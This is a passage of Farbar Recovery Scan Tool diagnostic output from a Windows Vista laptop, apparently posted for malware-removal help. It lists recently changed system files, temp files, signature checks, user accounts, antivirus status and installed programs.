2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-16 08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-30 12:27 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-30 12:27 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-30 12:19 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-30 12:15 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-30 12:15 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-30 12:15 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-29 17:57 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-01-27 03:15 - 2014-12-15 16:40 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Yahoo!
2016-01-27 03:15 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Yahoo!
2016-01-27 03:15 - 2014-12-15 16:39 - 00000000 ____D C:\Program Files (x86)\Yahoo!
2016-01-26 03:07 - 2006-11-02 08:33 - 00000000 ____D C:\Windows
2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf
2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer
2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job
2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job
2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache
2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help
2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT
2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan
2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree

==================== Files in the root of some directories =======

2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat
2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat
2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt
2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt

Some files in TEMP:
====================
C:\Users\Barbara\AppData\Local\Temp\exec.exe
C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll
C:\Users\Barbara\AppData\Local\Temp\sqlite3.dll
C:\Users\Barbara\AppData\Local\Temp\uires.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-30 12:28

==================== End of FRST.txt ============================

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016
Ran by Barbara (2016-01-30 12:36:06)
Running from C:\Users\Barbara\Desktop
Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled)
Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara
Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D}
AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation)
ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.)
Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation)
ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden
Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby)
DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.)
DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation)
DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden
Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version:  - )
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version:  - Lexmark International, Inc.)
Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version:  - )
LightScribe  1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation)
QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.)
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.)
RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH)
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden
Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation)
Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated)
TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation)
Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA)
TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version:  - )
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation)
